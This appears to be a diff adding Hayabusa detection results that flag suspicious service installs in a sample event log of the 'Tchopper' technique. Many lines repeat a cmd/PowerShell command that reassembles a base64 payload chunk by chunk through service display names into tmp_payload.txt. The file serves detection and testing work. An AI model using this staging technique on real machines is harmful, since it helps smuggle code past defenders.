+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
